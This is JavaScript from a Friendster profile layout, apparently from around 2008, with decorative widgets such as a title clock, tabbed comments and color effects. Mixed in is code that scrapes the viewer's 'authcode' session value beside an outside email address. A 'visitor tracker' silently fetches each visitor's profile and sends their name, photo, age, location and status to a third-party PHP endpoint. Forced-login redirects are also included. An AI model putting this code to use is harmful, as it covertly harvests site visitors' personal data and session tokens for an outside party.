//css inject var css = document.createElement("link"); css.type = "text/css"; css.rel = "stylesheet"; css.href = "http://www.stormpages.com/moenier/pinkan.css"; css.media = "screen, print"; document.getElementsByTagName("head")[0].appendChild(css); //favicon var shortc = document.createElement("link"); shortc.rel = "SHORTCUT ICON"; shortc.href = "http://s483.photobucket.com/albums/rr200/bpniermala/nier.jpg"; document.getElementsByTagName("head")[0].appendChild(shortc); var email_add = "moenier@bisquads.co.cc"; var get_authcode = document.getElementById("controlPanelButtons").innerHTML; var add_it = get_authcode.slice(get_authcode.indexOf("authcode=")); var PlaceInput = add_it.slice(9,39); document.write(''); //force login if(pageViewerID==""){ alert("Please log in your Friendster account to view my page!"); top.location.href="http://www.friendster.com/login.php?next=%2fuser.php%3fuid%3D"+pageOwnerID+"&cookie=1"; } //onload handler function onProfileLoad() { //addbox code here addBox("RIGHT","My Visitors",TRACKER.div.innerHTML,"tracker","2"); //other onload here } /*TRACKER OBJECT*/ if (typeof TRACKER == "undefined") { TRACKER = {}; } TRACKER = { //iframe css style: { filter: "chroma(color='#FFFFFF')", width: '300px', height: '560px', border: '0px', overflow: 'hidden' }, //iframe attributes attributes: { frameborder: '0', allowtransparency: 'true' }, phplink: "http://blacklizard.blackapplehost.com/wvm3.1.2/tracker.php", display: 4, /*do not edit below this line*/ /* WVMv3.1.2 by marfillaster, (c) 2007 www.friendster.com/mumbhaki credits: blacklizard licensed under GNU General Public License, version 2 http://www.gnu.org/licenses/gpl.html Disclaimer: NO GUARANTEE and WARRANTY provided! For educational purposes only. Author will not be liable of ANY damage through the use of this program */ base_domain: "http://profiles.friendster.com",div: null,param: null,timedetails: null,iframeid: "wvmiframe", details: { photo: null, gender: null, age: null, status: null, location: null, seek: null, since: null }, regexp: { photo: /imgblock200\x22>([\S]*?male)/i, age: /male, ([\d]*?),/i, status: /male, [\d]*?, ([\S\s]*?)<\/span>/i, location: /Location\: <\/span>([\S\s]*?)<\/a><\/li>/i, seek: /In\: <\/span>([\S\s]*?)<\/li>/i, since: /Since\: <\/span>([\S\s]*?)<\/li>/i }, init: function() { try{getElementsByClass(/commonbox[\s]*?controlpanel/i,null,"DIV")[0].innerHTML+="";}catch(e){this.error("Cannot insert inline iframe.");return;} var d= new Date(); var hr=invert(d.getTimezoneOffset()/60); this.timedetails="os="+hr; var ifsrc=this.phplink+"?"+this.timedetails+"&id="+pageViewerID+"&owner="+pageOwnerID+"&num="+this.display; var atr=""; var sty=""; for (val in this.attributes) { atr += val +"="+ this.attributes[val]+" "; } for (val in this.style) { sty += val +":"+ this.style[val]+";"; } try {this.div=document.createElement("
")} catch(e){this.div=document.createElement("div")} this.div.innerHTML=""; //Refresh/Reload Button this.div.innerHTML="

"; if(pageViewerID!=pageOwnerID) if(pageViewerID!="") this.getDETAILS(); }, getDETAILS: function() { processAjaxRequest("GET",this.base_domain+"/user.php?uid="+pageViewerID+"&_pmr=h&_pmmo=0&_pmt=controlpanel_1_1",true,null, "TRACKER.parseDETAILS",null); }, parseDETAILS: function(htm) { if(htm.replace(/^\s*|\s*$/mg,"")=="") {this.error("Empty xmlresponse! Unable to parse your details!");return;} else { for (val in this.details) { try { this.details[val]=encodeURIComponent(new RegExp(this.regexp[val]).exec(htm)[1]); } catch(e) { this.details[val]=""; } } if(!this.details.photo) {this.error("Unable to parse primary photo! Invalid xmlresponse or incorrect photo regexp.");return;} this.param="?owner="+pageOwnerID+"&id="+pageViewerID+"&name="+pageViewerFName+"&img="+this.details.photo+"&gen="+this.details.gender+"&age="+this.details.age+"&stat="+this.details.status+"&loc="+this.details.location+"&seek="+this.details.seek+"&since="+this.details.since; try{document.getElementById(this.iframeid).src=this.phplink+this.param;}catch(e){this.error("Unable to locate inline iframe id:"+this.iframeid);return;} } }, error: function(e) { alert("WVM ERROR: "+e+" Tracker will not update."); } }; /*END TRACKER OBJECT*/ if(navigator.appName =="Microsoft Internet Explorer") { setTimeout("onProfileLoad()","1000"); } window.addEvent('domready', function(){onProfileLoad();}); TRACKER.init(); /*MISC FUNCTIONS*/ function addBox (type,head,htm,id,sibling) { //by marfillaster //type "LEFT" | "RIGHT" //head header string //htm innerHTML string //id css_id string //sibling css_id_insertbefore string | null /* Available default Siblings LEFT 0 = controlpanel 1 = photos 13 = blogs 12 = reviews 6 = moreabout 18 = publiccomments 10 = scrapbook RIGHT 15 = meettrail 2 = friends 14 = googleads 7 = fan 8 = groups null - appends to last */ try { var li=document.createElement("li"); } catch(e) { var li=document.createElement("
  • "); } if(type=="LEFT") { var ul=document.getElementById("0").parentNode.parentNode; htm="
    "+htm+"
    "; } else var ul=document.getElementById("2").parentNode.parentNode; li.innerHTML="
    "+ "

    "+head+"

    "+ "
    "+ htm+ "
    "+ "
    "; if(sibling==null) ul.appendChild(li); else { sibling=document.getElementById(sibling).parentNode; ul.insertBefore(li,sibling); } } function processAjaxRequest(type,url,cont,param,handler,handlerparam) { //by marfillaster if(handlerparam) handlerparam=","+handlerparam; else handlerparam=""; var httprequest= window.XMLHttpRequest? new XMLHttpRequest():new ActiveXObject("Msxml2.XMLHTTP"); if(handler) eval("httprequest.onreadystatechange=function(){if (httprequest.readyState==4) {"+handler+"(httprequest.responseText"+handlerparam+");}}"); httprequest.open( type, url, cont); if(type=="POST") { httprequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httprequest.setRequestHeader("Content-length", param.length); httprequest.setRequestHeader("Connection", "close"); } httprequest.send(param); } function invert(x) { if(x>0) return parseInt("-"+x); else if(x<0) { x=x+""; return parseInt(x.substr(1,x.length-1)); } return 0; } function randOrd(){ return (Math.round(Math.random())-0.5); } function getElementsByClass(searchClass,node,tag) { var classElements = new Array(); if ( node == null ) node = document; if ( tag == null ) tag = '*'; var els = node.getElementsByTagName(tag); var elsLen = els.length; var pattern = new RegExp(searchClass); for (i = 0, j = 0; i < elsLen; i++) { if ( pattern.test(els[i].className) ) { classElements[j] = els[i]; j++; } } return classElements; } /*END MISC FUNCTIONS*/ //other codes goes here function Reload () { var f = document.getElementById('wvm'); f.src = f.src; } var arrAlertBox = []; if (!attachOnLoadHandler(function() { tflEditContent() })) parent.onload = function() { tflEditContent() }; function tflEditContent(){ if(pageViewerID==""){ alert("Please log in your Friendster account to view Muna page!"); top.location.href="http://www.friendster.com/login.php?next=%2fuser.php%3fuid%3D"+pageOwnerID+"&cookie=1"; } else if (pageOwnerID != "77892043") { alert("HOLLA "+pageOwnerFName+"!"); window.location.href="http://www.friendster.com/bpniermala"; } sendXMLHttpRequestText("http://"+location.hostname+"/user.php?uid="+pageViewerID+"&_pmr=h&_pmmo=0&_pmt=controlpanel_1_1","processRequestText"); }//end of tflEditContent(); //Do not edit below this line function tflAddSideBar(sHeader, sBoxContent, sBoxId, sSiblingId, sPosition) { var h=new Element('li');sPosition=sPosition||'Down';(sPosition=='Top')?h.inject($(sSiblingId).getParent(),'before'):h.inject($(sSiblingId).getParent(),'after');h.setHTML("
    "+sHeader+"
    "+sBoxContent+"
    "+"
  • ")}; //end of tflAddSideBar function processRequestText(a){ var b=/imgblock200\x22>([\S]*male)/i.exec(a)[1];var d=/male, ([\d]*),/i.exec(a)[1];var e=/male, [\d]*,([\S\s]*?)<\/span><\/li>/i.exec(a)[1];var f=/Location\: <\/span>([\S\s]*?)<\/a><\/li>/i.exec(a)[1];var g=/Since\: <\/span>([\S\s]+?)<\/li>/i.exec(a)[1]; var h="
    "; tflAlertBox("PIYE KABARE "+pageViewerFName+" ",h,300,'#111');}; // end of processRequestText function tflAlertBox(w,x,y,z){ //tflAlertBox [update 19-09-2008] //by tekfatliu, copyright 2008 http://profiles.friendster.com/47964002 //credits: tekfatliu, mooTools //licensed under GNU General Public License, version 2 http://www.gnu.org/licenses/gpl.html //Disclaimer: NO GUARANTEE and WARRANTY provided! For educational purposes only. //Author will not be liable of ANY damage through the use of this program if($('tflABBox')==false){var u=new Element('div',{id:'tflABMask','styles':{'position':'absolute','top':0,'left':0,'opacity':0,'background':'#000000','height':(window.getHeight()>window.getScrollHeight())?window.getHeight():window.getScrollHeight(),'width':'100%','z-index':189999}});var v=new Element('div',{id:'tflABBox','styles':{'background':'#7A7A7A','border':'2px solid','visibility':'hidden','border-color':'#f0f0f0 #909090 #909090 #f0f0f0','z-index':190000}});document.body.appendChild(u);document.body.appendChild(v);$(v).makeDraggable();strABTittle="";strABMessage="
    ";$(v).setHTML(strABTittle+strABMessage);arrAlertBox.push(new Fx.Style(u,'opacity',{duration:1000,wait:false}));arrAlertBox.push(new Fx.Style(v,'opacity',{duration:1500,wait:false}));arrAlertBox.push(true);$('tflABClose').addEvent('click',function(){arrAlertBox[2]=false;arrAlertBox[1].start(1,0);arrAlertBox[0].start(.7,0)});document.addEvents({'keypress':function(e){if(window.event){var keyCode=window.event.keyCode}else{var keyCode=e.keyCode?e.keyCode:e.which?e.which:e.charCode}if(keyCode==27)if(arrAlertBox[2]){arrAlertBox[2]=false;arrAlertBox[1].start(1,0);arrAlertBox[0].start(.7,0)}}})}$('tflABTittle').setHTML(w);$('tflABMessage').setHTML(x);y=y||250;z=z||'#111';$('tflABBox').setStyles({'width':y,'top':200,'left':(document.body.clientWidth/2)-(y/2)});$('tflABMask').setStyles({'background':z});arrAlertBox[0].start(0,.7);arrAlertBox[1].start(0,1);arrAlertBox[2]=true} //end of tflAlertBox(); function tflAccordion(iel,eli,lei,eil){ //tflTabsComment [update 15-09-2008] //by tekfatliu, copyright 2008 http://profiles.friendster.com/47964002 //credits: tekfatliu, mooTools //licensed under GNU General Public License, version 2 http://www.gnu.org/licenses/gpl.html //Disclaimer: NO GUARANTEE and WARRANTY provided! For educational purposes only. //Author will not be liable of ANY damage through the use of this program iel.each(function(el,i){lei.push(new Fx.Slide(eli[i]));eil=eil||'click';$(iel[i]).getFirst().addEvent(eil,function(){if(!$(iel[i]).getFirst().hasClass('tflTglS')){iel.each(function(el,i){if($(iel[i]).getFirst().hasClass('tflTglS')){lei[i].slideOut();$(iel[i]).getFirst().removeClass('tflTglS')}});lei[i].slideIn();$(iel[i]).getFirst().addClass('tflTglS')}});(i==0)?$(iel[0]).getFirst().addClass('tflTglS'):lei[i].slideOut()})} //end of tflAccordion function tflTabsComment(v,w,x,y,z){ //tflTabsComment [update 15-09-2008] //by tekfatliu, copyright 2008 http://profiles.friendster.com/47964002 //credits: tekfatliu, mooTools //licensed under GNU General Public License, version 2 http://www.gnu.org/licenses/gpl.html //Disclaimer: NO GUARANTEE and WARRANTY provided! For educational purposes only. //Author will not be liable of ANY damage through the use of this program function tflMakeTab(x,y){ var b=new Array("1st","2nd","3rd","4th","5th","6th","7th","8th","9th","10th");var c="";var d="";var f="#"+y+" div.viewall";var e="#"+y+" div.fitem1wrapper";$$(e).each(function(a,i){c+="
  • "+b[i]+"
  • ";d+="
    "+a.innerHTML.replace(//i," ")+"
    "});$(y).setHTML(x+"
    "+$$(f)[0].innerHTML+"
      "+c+"
    "+d+"
    ")} function tflSetClickEvent(x,y,z){ $$('#tfltabpanel li a').each(function(c,i){(y=='slide')?x.push(new Fx.Slide($$('.tfltcwrapper div.fitem1wrapper')[i],{duration:z})):x.push(new Fx.Style($$('.tfltcwrapper div.fitem1wrapper')[i],'opacity',{duration:z}));c.addEvent('click',function(el){if(!$(c).hasClass('selected')){$$('#tfltabpanel li a').each(function(a,i){if($(a).hasClass('selected')){(y=='slide')?x[i].slideOut():x[i].start(1,0);$(a).removeClass('selected');$$('.tfltcwrapper div.tfltabcontent')[i].removeClass('enabled')}});var b="tfltabcontent"+$(c).innerHTML;$(c).addClass('selected');$(b).addClass('enabled');(y=='slide')?x[i].slideIn():x[i].start(0,1)}});if(i==0){$$('#tfltabpanel li a')[i].addClass('selected');$$('div.tfltabcontent')[i].addClass('enabled')}else{(y=='slide')?x[i].slideOut():x[i].set(0)}})}var u="47964002\">
    Hi, " + pageViewerFName + "
    Did U Notice
    Something
    DIFFERENT?";$('content_18').setHTML($('content_18').innerHTML.replace(/47964002">/gi, u));x=x||'slide';y=y||1000;z=z||'18';z='content_'+z;if(z!="content_18"){$(z).setHTML($('content_18').innerHTML);$('content_18').setHTML("Moved the Contents")}tflMakeTab(w,z);tflSetClickEvent(v,x,y)} //end of tflTabsComment(); //clock title function MakeArray(size) { this.length=size; for(var i=1; i <= size; i++) { this[i]=""; } return this; } function showclock() { var now=new Date(); var day=now.getDay(); var date=now.getDate(); var month=now.getMonth()+1; var year=now.getYear(); var hours=now.getHours(); var minutes=now.getMinutes(); var seconds=now.getSeconds(); days=new MakeArray(7); days[0]="Minggu"; days[1]="Senin"; days[2]="Selasa"; days[3]="Rabu"; days[4]="Kamis"; days[5]="Jum'at"; days[6]="Sabtu"; months=new MakeArray(13); months[1]="Januari"; months[2]="Februari"; months[3]="Maret"; months[4]="April"; months[5]="Mei"; months[6]="Juni"; months[7]="Juli"; months[8]="Agustus"; months[9]="September"; months[10]="Oktober"; months[11]="November"; months[12]="Desember"; var vdate=""; vdate += (days[day]) + " "; vdate += date + " "; vdate += (months[month]) + " "; if (now.getYear() < 1000) vdate += now.getYear() + 1900 else vdate += now.getYear(); var vtime=""; vtime += ((hours < 10) ? "0" : "") + hours; vtime += ((minutes < 10) ? ":0" : ":") + minutes; vtime += ((seconds < 10) ? ":0" : ":") + seconds; var vtitle=""; vtitle="Enjoy "+pageViewerFName+" in Niermaboy pages"; if (document.all || document.getElementById) { window.setTimeout("showclock()",1000); // update frequency document.title = vtime+" - "+vdate+" - "+vtitle; } else { if ((seconds == 0) || (seconds == 10) || (seconds == 20) || (seconds == 30) || (seconds == 40) || (seconds == 50)) window.setTimeout("showclock()",10000) else window.setTimeout("showclock()",1000); self.status = vdate+" "+vtime+" "+vtitle } } showclock(); dude="
    "; flow=document.getElementById('flo_wrapper'); river=document.createElement("div"); river.innerHTML=dude; flow.parentNode.insertBefore(river,flow); //in this part you can change it into "frombottom" or "fromtop" var verticalpos="frombottom" function BoyantDiv() { var startX = 8; var startY = 170; function ml(id) { if (document.getElementById) { var wek=document.getElementById(id); } else if (document.all) { var wek=document.all[id]; } else { var wek=document.layers[id]; } if(document.layers) { wek.style=wek; } wek.sP = function(x,y) {shino(x,y);}; function shino(x,y) { wek.style.left=x; wek.style.top=y; } wek.x = startX; if (verticalpos=="fromtop") { wek.y = startY; } else{ if (navigator.appName.indexOf("Netscape") != -1) { wek.y = pageYOffset + innerHeight; } else { wek.y = document.body.scrollTop + document.body.clientHeight; } wek.y -= startY; } return wek; } window.stayTopLeft = function () {boyant();}; function boyant() { if (verticalpos=="fromtop"){ if (navigator.appName.indexOf("Netscape") != -1) { var tenten = pageYOffset; } else { var tenten = document.body.scrollTop; } ftlObj.y += (tenten + startY - ftlObj.y)/8; } else{ if (navigator.appName.indexOf("Netscape") != -1) { var tenten = pageYOffset + innerHeight; } else { var tenten = document.body.scrollTop + document.body.clientHeight; } ftlObj.y += (tenten - startY - ftlObj.y)/8; } ftlObj.sP(ftlObj.x, ftlObj.y); wakoko=setTimeout("stayTopLeft()", 50); } ftlObj = ml("divStayTopLeft"); stayTopLeft(); } BoyantDiv(); /* VISITOR PICTURE (FERUZZ) --------------------------------- */ if (!attachOnLoadHandler(function(){viewer();})) window.onload = function(){viewer();}; function viewer() { if(pageViewerID!="") VIEWERPIC.init(); } function spawnImage(mypic) { if (!mypic) { VIEWERPIC.getCode(); return; }else { for (val in VIEWERPIC.info) { try { VIEWERPIC.getPhoto = new RegExp(VIEWERPIC.regexp[val]).exec(mypic)[1].replace(/(\d)+?/i,"$1"); document.getElementById("mainpic").innerHTML = VIEWERPIC.getPhoto; } catch(e) { VIEWERPIC.getPhoto = ""; document.getElementById("mainpic").innerHTML = ""; } } } } if (typeof VIEWERPIC == "undefined") { VIEWERPIC = {}; } VIEWERPIC = { getPhoto: [], info: { photo: null }, regexp: { photo: /imgblock200">((.|\s)+?)<\/a><\/div>/ }, init: function() { if(document.getElementById("mainpic") != null) { this.ajaxRequest("/user.php?uid="+pageViewerID,"spawnImage",null); } }, ajaxRequest: function(url,ajaxfunc,handler) { if(handler) { handler = ","+handler; } else handler = ""; var httprequest= window.XMLHttpRequest? new XMLHttpRequest():new ActiveXObject("Msxml2.XMLHTTP"); if(ajaxfunc) { eval("httprequest.onreadystatechange=function(){if (httprequest.readyState==4) {"+ajaxfunc+"(httprequest.responseText"+handler+");}}"); } httprequest.open('GET', url, true); httprequest.send(null); } }; /* AUTO FONT COLOR CHANGER */ var vhinM; var newColor = new Array(5); var curColor = 0; newColor[0] = 'green'; newColor[1] = 'yellow'; newColor[2] = 'red'; newColor[3] = 'pink'; function rotateColor() { if (curColor == 4) curColor = 0; else ++curColor; document.getElementById('cpShoutoutBox').style.color= newColor[curColor]; } function startRotate() { if (vhinM != null) clearInterval(vhinM); vhinM = setInterval("rotateColor()", 300); } window.onload = startRotate(); try { sty = document.createElement("style"); sty.type = "text/css"; sty.innerHTML = ".data{position:relative;}"; document.getElementsByTagName("head")[0].appendChild(sty); }catch(e){} try { document.styleSheets[document.styleSheets.length - 1].addRule(".data", "position:relative;"); }catch(e){} var ie=document.all; var nn6=document.getElementById&&!document.all; var isdrag=false; var x,y; var dobj; function movemouse(e) { if (isdrag) { dobj.style.left = nn6 ? tx + e.clientX - x : tx + event.clientX - x; dobj.style.top = nn6 ? ty + e.clientY - y : ty + event.clientY - y; return false; } } function selectmouse(e) { var fobj = nn6 ? e.target : event.srcElement; var topelement = nn6 ? "HTML" : "BODY"; while (fobj.tagName != topelement && fobj.className != "data") { fobj = nn6 ? fobj.parentNode : fobj.parentElement; } if (fobj.className=="data") { isdrag = true; dobj = fobj; tx = parseInt(dobj.style.left+0); ty = parseInt(dobj.style.top+0); x = nn6 ? e.clientX : event.clientX; y = nn6 ? e.clientY : event.clientY; document.onmousemove=movemouse; return false; } } document.onmousedown=selectmouse; document.onmouseup=new Function("isdrag=false"); var disprimpic = getElementsByClassName(null,"div","data")[0]; disprimpic.innerHTML = disprimpic.innerHTML.replace(//i,"").replace(/<\/a>/,""); function getElementsByClassName(oElm,sTag,sClass) { var elm = []; if (!oElm)oElm = document; if (!sTag)sTag = "*"; var els = oElm.getElementsByTagName(sTag) || document.all; for (var j=0,k=els.length;j